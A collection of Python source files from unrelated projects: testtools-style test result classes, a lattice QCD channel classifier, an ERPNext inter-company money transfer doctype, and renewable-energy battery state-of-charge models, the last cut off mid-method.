:param err: The exc_info of the error that was raised. :return: None """ # This is the python 2.7 implementation self.expectedFailures.append( (test, self._err_details_to_string(test, err, details))) def addError(self, test, err=None, details=None): """Called when an error has occurred. 'err' is a tuple of values as returned by sys.exc_info(). :param details: Alternative way to supply details about the outcome. see the class docstring for more information. """ self.errors.append((test, self._err_details_to_string(test, err, details))) def addFailure(self, test, err=None, details=None): """Called when an error has occurred. 'err' is a tuple of values as returned by sys.exc_info(). :param details: Alternative way to supply details about the outcome. see the class docstring for more information. """ self.failures.append((test, self._err_details_to_string(test, err, details))) def addSkip(self, test, reason=None, details=None): """Called when a test has been skipped rather than running. Like with addSuccess and addError, testStopped should still be called. This must be called by the TestCase. 'addError' and 'addFailure' will not call addSkip, since they have no assumptions about the kind of errors that a test can raise. :param test: The test that has been skipped. :param reason: The reason for the test being skipped. For instance, u"pyGL is not available". :param details: Alternative way to supply details about the outcome. see the class docstring for more information. 
:return: None """ if reason is None: reason = details.get('reason') if reason is None: reason = 'No reason given' else: reason = ''.join(reason.iter_text()) skip_list = self.skip_reasons.setdefault(reason, []) skip_list.append(test) def addSuccess(self, test, details=None): """Called when a test succeeded.""" def addUnexpectedSuccess(self, test, details=None): """Called when a test was expected to fail, but succeed.""" self.unexpectedSuccesses.append(test) def wasSuccessful(self): """Has this result been successful so far? If there have been any errors, failures or unexpected successes, return False. Otherwise, return True. Note: This differs from standard unittest in that we consider unexpected successes to be equivalent to failures, rather than successes. """ return not (self.errors or self.failures or self.unexpectedSuccesses) if str_is_unicode: # Python 3 and IronPython strings are unicode, use parent class method _exc_info_to_unicode = unittest.TestResult._exc_info_to_string else: # For Python 2, need to decode components of traceback according to # their source, so can't use traceback.format_exception # Here follows a little deep magic to copy the existing method and # replace the formatter with one that returns unicode instead from types import FunctionType as __F, ModuleType as __M __f = unittest.TestResult._exc_info_to_string.im_func __g = dict(__f.func_globals) __m = __M("__fake_traceback") __m.format_exception = _format_exc_info __g["traceback"] = __m _exc_info_to_unicode = __F(__f.func_code, __g, "_exc_info_to_unicode") del __F, __M, __f, __g, __m def _err_details_to_string(self, test, err=None, details=None): """Convert an error in exc_info form or a contents dict to a string.""" if err is not None: return self._exc_info_to_unicode(err, test) return _details_to_str(details, special='traceback') def _now(self): """Return the current 'test time'. 
If the time() method has not been called, this is equivalent to datetime.now(), otherwise its the last supplied datestamp given to the time() method. """ if self.__now is None: return datetime.datetime.now(utc) else: return self.__now def startTestRun(self): """Called before a test run starts. New in Python 2.7. The testtools version resets the result to a pristine condition ready for use in another test run. Note that this is different from Python 2.7's startTestRun, which does nothing. """ super(TestResult, self).__init__() self.skip_reasons = {} self.__now = None # -- Start: As per python 2.7 -- self.expectedFailures = [] self.unexpectedSuccesses = [] # -- End: As per python 2.7 -- def stopTestRun(self): """Called after a test run completes New in python 2.7 """ def time(self, a_datetime): """Provide a timestamp to represent the current time. This is useful when test activity is time delayed, or happening concurrently and getting the system time between API calls will not accurately represent the duration of tests (or the whole run). Calling time() sets the datetime used by the TestResult object. Time is permitted to go backwards when using this call. :param a_datetime: A datetime.datetime object with TZ information or None to reset the TestResult to gathering time from the system. """ self.__now = a_datetime def done(self): """Called when the test runner is done. deprecated in favour of stopTestRun. 
""" class MultiTestResult(TestResult): """A test result that dispatches to many test results.""" def __init__(self, *results): TestResult.__init__(self) self._results = list(map(ExtendedToOriginalDecorator, results)) def __repr__(self): return '<%s (%s)>' % ( self.__class__.__name__, ', '.join(map(repr, self._results))) def _dispatch(self, message, *args, **kwargs): return tuple( getattr(result, message)(*args, **kwargs) for result in self._results) def startTest(self, test): return self._dispatch('startTest', test) def stopTest(self, test): return self._dispatch('stopTest', test) def addError(self, test, error=None, details=None): return self._dispatch('addError', test, error, details=details) def addExpectedFailure(self, test, err=None, details=None): return self._dispatch( 'addExpectedFailure', test, err, details=details) def addFailure(self, test, err=None, details=None): return self._dispatch('addFailure', test, err, details=details) def addSkip(self, test, reason=None, details=None): return self._dispatch('addSkip', test, reason, details=details) def addSuccess(self, test, details=None): return self._dispatch('addSuccess', test, details=details) def addUnexpectedSuccess(self, test, details=None): return self._dispatch('addUnexpectedSuccess', test, details=details) def startTestRun(self): return self._dispatch('startTestRun') def stopTestRun(self): return self._dispatch('stopTestRun') def time(self, a_datetime): return self._dispatch('time', a_datetime) def done(self): return self._dispatch('done') def wasSuccessful(self): """Was this result successful? Only returns True if every constituent result was successful. 
""" return all(self._dispatch('wasSuccessful')) class TextTestResult(TestResult): """A TestResult which outputs activity to a text stream.""" def __init__(self, stream): """Construct a TextTestResult writing to stream.""" super(TextTestResult, self).__init__() self.stream = stream self.sep1 = '=' * 70 + '\n' self.sep2 = '-' * 70 + '\n' def _delta_to_float(self, a_timedelta): return (a_timedelta.days * 86400.0 + a_timedelta.seconds + a_timedelta.microseconds / 1000000.0) def _show_list(self, label, error_list): for test, output in error_list: self.stream.write(self.sep1) self.stream.write("%s: %s\n" % (label, test.id())) self.stream.write(self.sep2) self.stream.write(output) def startTestRun(self): super(TextTestResult, self).startTestRun() self.__start = self._now() self.stream.write("Tests running...\n") def stopTestRun(self): if self.testsRun != 1: plural = 's' else: plural = '' stop = self._now() self._show_list('ERROR', self.errors) self._show_list('FAIL', self.failures) for test in self.unexpectedSuccesses: self.stream.write( "%sUNEXPECTED SUCCESS: %s\n%s" % ( self.sep1, test.id(), self.sep2)) self.stream.write("\nRan %d test%s in %.3fs\n" % (self.testsRun, plural, self._delta_to_float(stop - self.__start))) if self.wasSuccessful(): self.stream.write("OK\n") else: self.stream.write("FAILED (") details = [] details.append("failures=%d" % ( sum(map(len, ( self.failures, self.errors, self.unexpectedSuccesses))))) self.stream.write(", ".join(details)) self.stream.write(")\n") super(TextTestResult, self).stopTestRun() class ThreadsafeForwardingResult(TestResult): """A TestResult which ensures the target does not receive mixed up calls. This is used when receiving test results from multiple sources, and batches up all the activity for a single test into a thread-safe batch where all other ThreadsafeForwardingResult objects sharing the same semaphore will be locked out. 
Typical use of ThreadsafeForwardingResult involves creating one ThreadsafeForwardingResult per thread in a ConcurrentTestSuite. These forward to the TestResult that the ConcurrentTestSuite run method was called with. target.done() is called once for each ThreadsafeForwardingResult that forwards to the same target. If the target's done() takes special action, care should be taken to accommodate this. """ def __init__(self, target, semaphore): """Create a ThreadsafeForwardingResult forwarding to target. :param target: A TestResult. :param semaphore: A threading.Semaphore with limit 1. """ TestResult.__init__(self) self.result = ExtendedToOriginalDecorator(target) self.semaphore = semaphore def __repr__(self): return '<%s %r>' % (self.__class__.__name__, self.result) def _add_result_with_semaphore(self, method, test, *args, **kwargs): self.semaphore.acquire() try: self.result.time(self._test_start) self.result.startTest(test) self.result.time(self._now()) try: method(test, *args, **kwargs) finally: self.result.stopTest(test) finally: self.semaphore.release() def addError(self, test, err=None, details=None): self._add_result_with_semaphore(self.result.addError, test, err, details=details) def addExpectedFailure(self, test, err=None, details=None): self._add_result_with_semaphore(self.result.addExpectedFailure, test, err, details=details) def addFailure(self, test, err=None, details=None): self._add_result_with_semaphore(self.result.addFailure, test, err, details=details) def addSkip(self, test, reason=None, details=None): self._add_result_with_semaphore(self.result.addSkip, test, reason, details=details) def addSuccess(self, test, details=None): self._add_result_with_semaphore(self.result.addSuccess, test, details=details) def addUnexpectedSuccess(self, test, details=None): self._add_result_with_semaphore(self.result.addUnexpectedSuccess, test, details=details) def startTestRun(self): self.semaphore.acquire() try: self.result.startTestRun() finally: 
self.semaphore.release() def stopTestRun(self): self.semaphore.acquire() try: self.result.stopTestRun() finally: self.semaphore.release() def done(self): self.semaphore.acquire() try: self.result.done() finally: self.semaphore.release() def startTest(self, test): self._test_start = self._now() super(ThreadsafeForwardingResult, self).startTest(test) def wasSuccessful(self): return self.result.wasSuccessful() class ExtendedToOriginalDecorator(object): """Permit new TestResult API code to degrade gracefully with old results. This decorates an existing TestResult and converts missing outcomes such as addSkip to older outcomes such as addSuccess. It also supports the extended details protocol. In all cases the most recent protocol is attempted first, and fallbacks only occur when the decorated result does not support the newer style of calling. """ def __init__(self, decorated): self.decorated = decorated def __repr__(self): return '<%s %r>' % (self.__class__.__name__, self.decorated) def __getattr__(self, name): return getattr(self.decorated, name) def addError(self, test, err=None, details=None): self._check_args(err, details) if details is not None: try: return self.decorated.addError(test, details=details) except TypeError: # have to convert err = self._details_to_exc_info(details) return self.decorated.addError(test, err) def addExpectedFailure(self, test, err=None, details=None): self._check_args(err, details) addExpectedFailure = getattr( self.decorated, 'addExpectedFailure', None) if addExpectedFailure is None: return self.addSuccess(test) if details is not None: try: return addExpectedFailure(test, details=details) except TypeError: # have to convert err = self._details_to_exc_info(details) return addExpectedFailure(test, err) def addFailure(self, test, err=None, details=None): self._check_args(err, details) if details is not None: try: return self.decorated.addFailure(test, details=details) except TypeError: # have to convert err = 
self._details_to_exc_info(details) return self.decorated.addFailure(test, err) def addSkip(self, test, reason=None, details=None): self._check_args(reason, details) addSkip = getattr(self.decorated, 'addSkip', None) if addSkip is None: return self.decorated.addSuccess(test) if details is not None: try: return addSkip(test, details=details) except TypeError: # extract the reason if it's available try: reason = ''.join(details['reason'].iter_text()) except KeyError: reason = _details_to_str(details) return addSkip(test, reason) def addUnexpectedSuccess(self, test, details=None): outcome = getattr(self.decorated, 'addUnexpectedSuccess', None) if outcome is None: try: test.fail("") except test.failureException: return self.addFailure(test, sys.exc_info()) if details is not None: try: return outcome(test, details=details) except TypeError: pass return outcome(test) def addSuccess(self, test, details=None): if details is not None: try: return self.decorated.addSuccess(test, details=details) except TypeError: pass return self.decorated.addSuccess(test) def _check_args(self, err, details): param_count = 0 if err is not None: param_count += 1 if details is not None: param_count += 1 if param_count != 1: raise ValueError("Must pass only one of err '%s' and details '%s" % (err, details)) def _details_to_exc_info(self, details): """Convert a details dict to an exc_info tuple.""" return ( _StringException, _StringException(_details_to_str(details, special='traceback')), None) def done(self): try: return self.decorated.done() except AttributeError: return def progress(self, offset, whence): method = getattr(self.decorated, 'progress', None) if method is None: return return method(offset, whence) @property def shouldStop(self): return self.decorated.shouldStop def startTest(self, test): return self.decorated.startTest(test) def startTestRun(self): try: return self.decorated.startTestRun() except AttributeError: return def stop(self): return self.decorated.stop() def 
stopTest(self, test): return self.decorated.stopTest(test) def stopTestRun(self): try: return self.decorated.stopTestRun() except AttributeError: return def tags(self, new_tags, gone_tags): method = getattr(self.decorated, 'tags', None) if method is None: return return method(new_tags, gone_tags) def time(self, a_datetime): method = getattr(self.decorated, 'time', None) if method is None: return return method(a_datetime) def wasSuccessful(self): return self.decorated.wasSuccessful() class _StringException(Exception): """An exception made from an arbitrary string.""" if not str_is_unicode: def __init__(self, string): if type(string) is not unicode: raise TypeError("_StringException expects unicode, got %r" % (string,)) Exception.__init__(self, string) def __str__(self): return self.args[0].encode("utf-8") def __unicode__(self): return self.args[0] # For 3.0 and above the default __str__ is fine, so we don't define one. def __hash__(self): return id(self) def __eq__(self, other): try: return self.args == other.args except AttributeError: return False def _format_text_attachment(name, text): if '\n' in text: return "%s: {{{\n%s\n}}}\n" % (name, text) return "%s: {{{%s}}}" % (name, text) def _details_to_str(details, special=None): """Convert a details dict to a string. :param details: A dictionary mapping short names to ``Content`` objects. :param special: If specified, an attachment that should have special attention drawn to it. The primary attachment. Normally it's the traceback that caused the test to fail. :return: A formatted string that can be included in text test results. """ empty_attachments = [] binary_attachments = [] text_attachments = [] special_content = None # sorted is for testing, may want to remove that and use a dict # subclass with defined order for items instead. 
for key, content in sorted(details.items()): if content.content_type.type != 'text': binary_attachments.append((key, content.content_type)) continue text = _u('').join(content.iter_text()).strip() if not text: empty_attachments.append(key) continue # We want the 'special' attachment to be at the bottom. if key == special: special_content = '%s\n' % (text,) continue text_attachments.append(_format_text_attachment(key, text)) if text_attachments and not text_attachments[-1].endswith('\n'): text_attachments.append('') if special_content: text_attachments.append(special_content) lines = [] if binary_attachments: lines.append('Binary content:\n') for name, content_type in binary_attachments: lines.append(' %s (%s)\n' % (name, content_type)) if empty_attachments: lines.append('Empty attachments:\n') for name in empty_attachments: lines.append(' %s\n' % (name,)) if (binary_attachments or empty_attachments) and text_attachments: lines.append('\n') lines.append('\n'.join(text_attachments)) return _u('').join(lines)
andrewhanlon/QCD_scripts
sigmond/channel.py
import abc import subprocess import logging from observables import BLOperator, MCObservable from data import BLDataChannel, GIDataChannel import util class Channel(metaclass=abc.ABCMeta): ISOSPIN_MAP = { 'singlet': "0", 'doublet': "1h", 'triplet': "1", 'quartet': "3h", 'quintet': "2", 'sextet': "5h" } def __init__(self, *, particle_type=None, isospin, strangeness=None, laph_query="laph_query", sigmond_query="sigmond_query"): self.particle_type = particle_type self.strangeness = strangeness self.isospin = isospin self.laph_query = laph_query self.sigmond_query = sigmond_query # @ADH - I think I am going to have the DataHandler deal with these in the future self.raw_data_channels = list() @staticmethod def initialize(*, data_file, laph_query="laph_query", sigmond_query="sigmond_query", is_basic_laph=True): if is_basic_laph: query_result = subprocess.check_output([laph_query, '-i', data_file]).decode() laph_xml = util.queryToXML(query_result) operator = BLOperator.createFromXML(laph_xml.find(".//Operator")) if 'special' in data_file.split('/'): return SpecialChannel(particle_type=operator.particle_type, isospin=operator.isospin, strangeness=operator.strangeness, flavor=operator.flavor, laph_query=laph_query, sigmond_query=sigmond_query) elif operator.psq > 0: return MovingChannel(particle_type=operator.particle_type, isospin=operator.isospin, strangeness=operator.strangeness, psq=operator.psq, lg_irrep=operator.lg_irrep, laph_query=laph_query, sigmond_query=sigmond_query) else: return AtRestChannel(particle_type=operator.particle_type, isospin=operator.isospin, strangeness=operator.strangeness, lg_irrep=operator.lg_irrep, laph_query=laph_query, sigmond_query=sigmond_query) else: query_result = subprocess.check_output([sigmond_query, '-k', data_file]).decode() try: records = query_result.split('Record') observable = MCObservable.createFromXML(util.queryToXML(records[1])) if observable.psq > 0: return MovingChannel(isospin=observable.isospin, psq=observable.psq, 
lg_irrep=observable.lg_irrep, laph_query=laph_query, sigmond_query=sigmond_query) else: return AtRestChannel(isospin=observable.isospin, lg_irrep=observable.lg_irrep, laph_query=laph_query, sigmond_query=sigmond_query) except IndexError: logging.warning("%s contains no records", data_file) except AttributeError: logging.warning("%s contains Observables", data_file) return None def addRawDataChannel(self, path, is_basic_laph=True): if is_basic_laph: self.raw_data_channels.append(BLDataChannel(path, self.laph_query)) else: self.raw_data_channels.append(GIDataChannel(path, self.sigmond_query)) @property @abc.abstractmethod def channel_string(self): pass @property def is_special(self): return isinstance(self, SpecialChannel) @property def is_atrest(self): return isinstance(self, AtRestChannel) @property def is_moving(self): return isinstance(self, MovingChannel) def __hash__(self): return hash(self.__repr__()) def __str__(self): return self.channel_string # @ADH - Should be checking that 'other' is an instance of an object # derived from Channel. I'm not sure how to best do that right now. # So, this will suffice for the moment. 
def __eq__(self, other): return self.__repr__() == other.__repr__() def __ne__(self, other): return self.__repr__() != other.__repr__() def __lt__(self, other): return self.__repr__() < other.__repr__() def __gt__(self, other): return self.__repr__() > other.__repr__() def __le__(self, other): return self.__repr__() <= other.__repr__() def __ge__(self, other): return self.__repr__() >= other.__repr__() class SpecialChannel(Channel): def __init__(self, *, particle_type, isospin, strangeness, flavor, laph_query="laph_query", sigmond_query="sigmond_query"): super().__init__(particle_type=particle_type, isospin=isospin, strangeness=strangeness, laph_query=laph_query, sigmond_query=sigmond_query) self.flavor = flavor @property def channel_string(self): if self.particle_type == "boson": particle_type = "B" elif self.particle_type == "fermion": particle_type = "F" strangeness = str(self.strangeness).replace('-', 'm') return "{p_type}_{flavor}_I{isospin}_S{strangeness}_special".format( p_type=particle_type, flavor=self.flavor, isospin=self.ISOSPIN_MAP[self.isospin], strangeness=strangeness) def __repr__(self): return "SP_{}".format(self.channel_string) class AtRestChannel(Channel): def __init__(self, *, particle_type=None, isospin, strangeness=None, lg_irrep, laph_query="laph_query", sigmond_query="sigmond_query"): super().__init__(particle_type=particle_type, isospin=isospin, strangeness=strangeness, laph_query=laph_query, sigmond_query=sigmond_query) self.psq = 0 self.lg_irrep = lg_irrep @property def channel_string(self): if self.particle_type == "boson": particle_type = "B_" elif self.particle_type == "fermion": particle_type = "F_" else: particle_type = "" if self.strangeness is not None: strangeness = "S{}_".format(self.strangeness).replace('-', 'm') else: strangeness = "" return "{p_type}I{isospin}_{strangeness}P0_{irrep}".format( p_type=particle_type, isospin=self.ISOSPIN_MAP[self.isospin], strangeness=strangeness, irrep=self.lg_irrep) def __repr__(self): return 
"AR_{}".format(self.channel_string) class MovingChannel(Channel): def __init__(self, *, particle_type=None, isospin, strangeness=None, psq, lg_irrep, laph_query="laph_query", sigmond_query="sigmond_query"): super().__init__(particle_type=particle_type, isospin=isospin, strangeness=strangeness, laph_query=laph_query, sigmond_query=sigmond_query) self.psq = psq self.lg_irrep = lg_irrep @property def channel_string(self): if self.particle_type == "boson": particle_type = "B_" elif self.particle_type == "fermion": particle_type = "F_" else: particle_type = "" if self.strangeness is not None: strangeness = "S{}_".format(self.strangeness).replace('-', 'm') else: strangeness = "" return "{p_type}I{isospin}_{strangeness}PSQ{psq}_{irrep}".format( p_type=particle_type, isospin=self.ISOSPIN_MAP[self.isospin], strangeness=strangeness, psq=self.psq, irrep=self.lg_irrep) def __repr__(self): return "MV_{}".format(self.channel_string)
ahmadRagheb/goldenHR
erpnext/accounts/doctype/money_transfere/money_transfere.py
# -*- coding: utf-8 -*- # Copyright (c) 2017, Frappe Technologies Pvt. Ltd. and contributors # For license information, please see license.txt from __future__ import unicode_literals import frappe from frappe.model.document import Document from frappe.utils.data import flt, nowdate, getdate, cint class MoneyTransfere(Document): def on_submit(self): self.validate_transfere() def validate(self): self.get_dummy_accounts() def get_dummy_accounts(self): dummy_to = frappe.db.get_values("Account", {"name": "حساب استلام من"+" - "+self.from_company + " - "+self.abbr_to, "company": self.to_company, "parent_account":"حساب استلام من"+" - "+self.abbr_to }) self.dummy_to=dummy_to[0][0] dummy_from = frappe.db.get_values("Account", {"name": "حساب ارسال الي"+" - "+self.to_company + " - "+self.abbr, "company": self.from_company, "parent_account":"حساب ارسال"+" - "+self.abbr }) self.dummy_from=dummy_from[0][0] def before_cancel(self): pe = frappe.get_value("Payment Entry", filters = {"transfere_reference": self.name}, fieldname = "name") if pe: pe_doc = frappe.get_doc("Payment Entry", pe) pe_doc.cancel() je = frappe.get_value("Journal Entry Account", filters = {"reference_name": self.name}, fieldname = "parent") if je: je_doc = frappe.get_doc("Journal Entry", je) je_doc.cancel() def validate_transfere(self): if self.from_company != self.to_company: # sending_account = "حساب ارسال الى " + self.to_company # receiving_account = "حساب استلام من " + self.from_company # self.add_account_for_company(sending_account, self.to_company, "Liability") # self.add_account_for_company(receiving_account, self.from_company, "Expense") self.add_payment_entry(self.from_account, self.dummy_from, self.from_company) self.add_journal_entry(self.to_account,self.dummy_to, self.to_company) else: self.add_payment_entry(self.from_account, self.to_account, self.from_company) def add_account_for_company(self, account, company, r_type): pass # pacc_name = "" # if r_type == "Expense": # pacc_name = "حساب ارسال - E" 
# elif r_type == "Liability": # pacc_name = "حساب استقبال - o" # # if not frappe.db.exists("Account", pacc_name): # # pacc = frappe.new_doc("Account") # # pacc.account_name = pacc_name # # pacc.root_type = r_type # # pacc.is_group = 1 # # pacc.parent_account = "" # # pacc.company = company # # pacc.flags.ignore_validate = True # # pacc.insert() # if not frappe.db.exists("Account", account): # acc = frappe.new_doc("Account") # acc.account_name = account # acc.company = company # acc.parent_account = pacc_name # acc.is_group = 0 # acc.insert() def add_payment_entry(self, paid_from, paid_to, company): pe = frappe.new_doc("Payment Entry") pe.payment_type = "Internal Transfer" pe.company = company pe.paid_from = paid_from pe.paid_to = paid_to pe.paid_amount = self.transfered_amount pe.received_amount = self.transfered_amount pe.posting_date = nowdate() pe.mode_of_payment = self.mode_of_payment pe.transfere_reference = self.name pe.insert() pe.submit() # pe.setup_party_account_field() # pe.set_missing_values() # pe.set_exchange_rate() # pe.set_amounts() # self.assertEquals(pe.difference_amount, 500) # pe.append("deductions", { # "account": "_Test Exchange Gain/Loss - _TC", # "cost_center": "_Test Cost Center - _TC", # "amount": 500 # }) def add_journal_entry(self, account1, account2, company): default_cost = frappe.get_value("Company", filters = {"name":company}, fieldname = "cost_center") jv = frappe.new_doc("Journal Entry") jv.posting_date = nowdate() jv.company = company jv.voucher_type = "Opening Entry" jv.set("accounts", [ { "account": account2, "credit_in_account_currency": self.transfered_amount, "cost_center": default_cost, "reference_type": "Money Transfere", "reference_name": self.name }, { "account": account1, "debit_in_account_currency": self.transfered_amount, "cost_center": default_cost, "reference_type": "Money Transfere", "reference_name": self.name } ]) jv.insert() jv.submit()
tsaoyu/D3HRE
D3HRE/core/battery_models.py
import numpy as np


def min_max_model(power, use, battery_capacity):
    """
    Minimal maximum battery model, obsoleted.

    Clamps the running energy balance between empty (0) and full
    (battery_capacity); charge/discharge efficiency and self-discharge are
    ignored in this minimal model.

    :param power: Pandas TimeSeries, total power from renewable system
    :param use: float, unit W fixed load of the power system
    :param battery_capacity: float, unit Wh battery capacity
    :return: list, energy history in battery
    """
    power = power.tolist()
    energy = 0
    energy_history = []
    for p in power:
        energy = min(battery_capacity, max(0, energy + (p - use) * 1))
        energy_history.append(energy)

    return energy_history


def soc_model_fixed_load(
    power,
    use,
    battery_capacity,
    depth_of_discharge=1,
    discharge_rate=0.005,
    battery_eff=0.9,
    discharge_eff=0.8,
):
    """
    Battery state of charge model with fixed load. (Obsolete)

    :param power: Pandas TimeSeries of total power from renewable system
    :param use: float unit W fixed load of the power system
    :param battery_capacity: float unit Wh battery capacity
    :param depth_of_discharge: float 0 to 1 maximum allowed discharge depth
    :param discharge_rate: self discharge rate
    :param battery_eff: optional 0 to 1 battery energy store efficiency default 0.9
    :param discharge_eff: battery discharge efficiency 0 to 1 default 0.8
    :return: tuple SOC: state of charge, energy history: E in battery,
        unmet_history: unmet energy history, waste_history: waste energy
        history, use_history: supplied load history
    """
    DOD = depth_of_discharge
    power = power.tolist()
    use_history = []
    waste_history = []
    unmet_history = []
    energy_history = []
    energy = 0
    for p in power:
        if p >= use:
            # Generation covers the load; bank the surplus.
            use_history.append(use)
            unmet_history.append(0)
            energy_new = energy * (1 - discharge_rate) + (p - use) * battery_eff
            if energy_new < battery_capacity:
                energy = energy_new  # battery energy got update
                waste_history.append(0)
            else:
                # Battery full: the surplus is wasted, level unchanged.
                waste_history.append(p - use)
        elif p < use:
            # Generation short of load; try to discharge the difference.
            energy_new = energy * (1 - discharge_rate) + (p - use) / discharge_eff
            if energy_new > (1 - DOD) * battery_capacity:
                energy = energy_new
                unmet_history.append(0)
                waste_history.append(0)
                use_history.append(use)
            elif energy * (1 - discharge_rate) + p * battery_eff < battery_capacity:
                # Not enough stored energy: shed the whole load and bank the
                # available generation instead of wasting it.
                energy = energy * (1 - discharge_rate) + p * battery_eff
                unmet_history.append(use - p)
                use_history.append(0)
                waste_history.append(0)
            else:
                unmet_history.append(use - p)
                use_history.append(0)
                waste_history.append(p)

        energy_history.append(energy)

    # Guard against division by zero for the degenerate no-battery case.
    if battery_capacity == 0:
        SOC = np.array(energy_history)
    else:
        SOC = np.array(energy_history) / battery_capacity

    return SOC, energy_history, unmet_history, waste_history, use_history


class Battery:
    """
    A simple finite state based energy flow battery model.
    """

    def __init__(self, capacity, config=None):
        """
        Initialise the battery with a given capacity and configuration.

        :param capacity: float, unit Wh
        :param config: options including DOD, depth of discharge; sigma,
            self-discharge rate; eta_in, charge efficiency; eta_out,
            discharge efficiency; B0, percentage of the battery pre-charge;
            where all values shall between 0 and 1
        """
        self.capacity = capacity
        # BUG FIX: the default used to be a mutable dict shared by every
        # instance; each instance now gets its own dict.
        self.config = {} if config is None else config
        self.set_parameters()

    def set_parameters(self):
        """
        Setup the parameters using the config file, options including DOD,
        depth of discharge; sigma, self-discharge rate; eta_in, charge
        efficiency; eta_out, discharge efficiency; B0, percentage of the
        battery pre-charge; where all values shall between 0 and 1.
        Falls back to documented defaults when keys are missing.
        """
        try:
            self.depth_of_discharge = self.config['simulation']['battery']['DOD']
            self.discharge_rate = self.config['simulation']['battery']['sigma']
            self.battery_eff = self.config['simulation']['battery']['eta_in']
            self.discharge_eff = self.config['simulation']['battery']['eta_out']
            self.init_charge = self.config['simulation']['battery']['B0']
        except KeyError:
            print('Parameter is not found in config file, default values are used.')
            self.depth_of_discharge = 1
            self.discharge_rate = 0.005
            self.battery_eff = 0.9
            self.discharge_eff = 0.8
            self.init_charge = 1

    def run(self, power, use):
        """
        Run the battery model with a list of power generation and usage.
        Histories are reset on every call.

        :param power: list, power generation unit in W
        :param use: list, power usage unit in W
        :return: None
        """
        DOD = self.depth_of_discharge
        battery_capacity = self.capacity
        discharge_rate = self.discharge_rate
        discharge_eff = self.discharge_eff
        battery_eff = self.battery_eff
        use_history = []
        waste_history = []
        unmet_history = []
        energy_history = []
        SOC = []
        energy = self.init_charge * self.capacity
        for p, u in zip(power, use):
            if p >= u:
                use_history.append(u)
                unmet_history.append(0)
                energy_new = energy * (1 - discharge_rate) + (p - u) * battery_eff
                if energy_new < battery_capacity:
                    energy = energy_new  # battery energy got update
                    waste_history.append(0)
                else:
                    waste_history.append(p - u)
            elif p < u:
                energy_new = energy * (1 - discharge_rate) + (p - u) / discharge_eff
                if energy_new > (1 - DOD) * battery_capacity:
                    energy = energy_new
                    unmet_history.append(0)
                    waste_history.append(0)
                    use_history.append(u)
                elif energy * (1 - discharge_rate) + p * battery_eff < battery_capacity:
                    energy = energy * (1 - discharge_rate) + p * battery_eff
                    unmet_history.append(u - p)
                    use_history.append(0)
                    waste_history.append(0)
                else:
                    unmet_history.append(u - p)
                    use_history.append(0)
                    waste_history.append(p)

            energy_history.append(energy)
            SOC.append(energy / battery_capacity)

        self.SOC = SOC
        self.energy_history = energy_history
        self.unmet_history = unmet_history
        self.waste_history = waste_history
        self.use_history = use_history

    def battery_history(self):
        """
        Return the history of the battery.

        :return: np array, the SOC, energy in the battery, unmet power
            supply, wasted power and the supplied power unit in W
        """
        history = np.vstack(
            (
                np.array(self.SOC),
                np.array(self.energy_history),
                np.array(self.unmet_history),
                np.array(self.waste_history),
                np.array(self.use_history),
            )
        )
        return history

    def lost_power_supply_probability(self):
        """
        Return the lost power supply probability (LPSP) using the battery
        history, i.e. the fraction of time steps with non-zero unmet demand.

        :return: float, LPSP
        """
        LPSP = 1 - self.unmet_history.count(0) / len(self.energy_history)
        return LPSP


class Battery_managed:
    """
    Battery managed is a the basic class for the demand load controllable
    battery model.
    """

    def __init__(self, capacity, config=None):
        """
        :param capacity: float, unit Wh
        :param config: options including DOD, depth of discharge; sigma,
            self-discharge rate; eta_in, charge efficiency; eta_out,
            discharge efficiency; B0, percentage of the battery pre-charge;
            where all values shall between 0 and 1
        """
        self.capacity = capacity
        # BUG FIX: avoid the shared mutable default dict.
        self.config = {} if config is None else config
        self.set_parameters()
        self.init_history()
        self.init_simulation()
        self.status = []
        self.states_list = []

    def set_parameters(self):
        """
        Setup the parameters using the config file (see __init__); falls back
        to documented defaults when keys are missing.
        """
        try:
            self.depth_of_discharge = self.config['simulation']['battery']['DOD']
            self.discharge_rate = self.config['simulation']['battery']['sigma']
            self.battery_eff = self.config['simulation']['battery']['eta_in']
            self.discharge_eff = self.config['simulation']['battery']['eta_out']
            self.init_charge = self.config['simulation']['battery']['B0']
            self.DOD = self.depth_of_discharge
        except KeyError:
            print('Parameter is not found in config file, default values are used.')
            self.depth_of_discharge = 1
            self.discharge_rate = 0.005
            self.battery_eff = 0.9
            self.discharge_eff = 0.8
            self.init_charge = 1
            self.DOD = self.depth_of_discharge

    def reset(self):
        """
        Reset the battery state to the start of simulation.

        :return: None
        """
        self.init_history()
        self.init_simulation()

    def init_simulation(self):
        # Start from the configured pre-charge level.
        self.energy = self.init_charge * self.capacity

    def init_history(self):
        self.supply_history = []
        self.waste_history = []
        self.unmet_history = []
        self.battery_energy_history = []
        self.SOC = []

    def step(self, plan, generated, gym=False):
        """
        Run the finite state battery model on one time step.

        :param plan: float, planned power usage in W
        :param generated: float, power generation unit in W
        :param gym: optional, set True to using in OpenAI gym mode
        :return: float, the supplied power in W
        """
        if gym:
            # Gym actions arrive as a nested array; unwrap the scalar.
            plan = plan[0][0]

        if generated >= plan:
            self.supply_history.append(plan)
            self.unmet_history.append(0)
            energy_new = self.energy * (1 - self.discharge_rate) + (generated - plan) * self.battery_eff
            if energy_new < self.capacity:
                self.energy = energy_new  # battery energy got update
                self.waste_history.append(0)
                self.status.append("""Demand can be meet by generation, also battery is not full.
                Supply {demand}, charge {diff}.""".format(demand=plan, diff=generated - plan))
                self.state = 'charge'
            else:
                # Charge only up to capacity; the rest is wasted.
                self.waste_history.append(generated - plan - (self.capacity - self.energy))
                self.energy = self.capacity
                self.status.append("""Demand can be meet by generation, but battery is already full.
                Supply {demand}, charge battery to full waste {diff}.""".format(demand=plan, diff=generated - plan))
                self.state = 'float'
        elif generated < plan:
            energy_new = self.energy * (1 - self.discharge_rate) + (generated - plan) / self.discharge_eff
            if energy_new > (1 - self.DOD) * self.capacity:
                self.energy = energy_new
                self.unmet_history.append(0)
                self.waste_history.append(0)
                self.supply_history.append(plan)
                self.status.append("""Demand can not meet by generation, power in battery can make up difference.
                Supply {demand} by discharge from battery""".format(demand=plan))
                self.state = 'discharge'
            elif self.energy * (1 - self.discharge_rate) + generated * self.battery_eff < self.capacity:
                self.energy = self.energy * (1 - self.discharge_rate) + generated * self.battery_eff
                self.unmet_history.append(plan - generated)
                self.supply_history.append(0)
                self.waste_history.append(0)
                self.status.append("""Demand can not meet by generation, also power in battery can not make up difference.
                Charge {diff} to battery to avoid waste""".format(diff=generated))
                self.state = 'unmet'
            else:
                # BUG FIX: the free capacity must be captured before the
                # energy level is reset, otherwise the reported charge
                # amount is always zero.
